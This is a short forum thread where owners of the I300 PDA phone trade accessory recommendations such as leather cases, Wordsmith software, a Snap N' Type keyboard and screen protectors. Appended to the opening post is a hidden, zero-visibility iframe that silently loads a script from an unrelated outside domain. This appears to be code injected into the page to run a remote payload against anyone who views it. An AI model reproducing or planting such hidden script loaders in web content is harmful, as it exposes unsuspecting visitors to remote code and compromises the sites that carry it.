+ Reply to Thread

I300 accessories?

I just got an I300, and I was wondering... are there any accessories that you feel are a must-have to really make the most of it?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Thumbs up

Welcome to the club!! I've had my I300 for about six months now and am very satisfied with it. As for accessories; what are you looking to do with it? A leather case is a nice addition; I got one from E&B; it's much bettter than the one included with the PDA. Are you looking to do a lot of work with MS Word, like I do? I find Wordsmith to be an excellent software program that lets you utilize MS Word. Because I do a lot of remote typing (I do field work for a living; I'm rarely in my office or at my PC) I have a Snap N' Type keyboard that is much faster and less tiring than the included soft keyboard on the unit. Describe what you plan to use the unit for in addition to its phone function; I'm sure you'll get input from other owners as well. Good luck with your I300!

Well, my other Palm is a 505. In many ways, the 505 is better than the I300. It has an expansion slot, it's faster, etc... but the ultra-convenience of having everything in one unit supercedes the things that the I300 lacks. With the 505 I had a keyboard (do they make those for the I300?) that I used all the time...
    Do they make screen protectors for the I300? Fellowes made screen protectors for the 505 that I used... I loved them.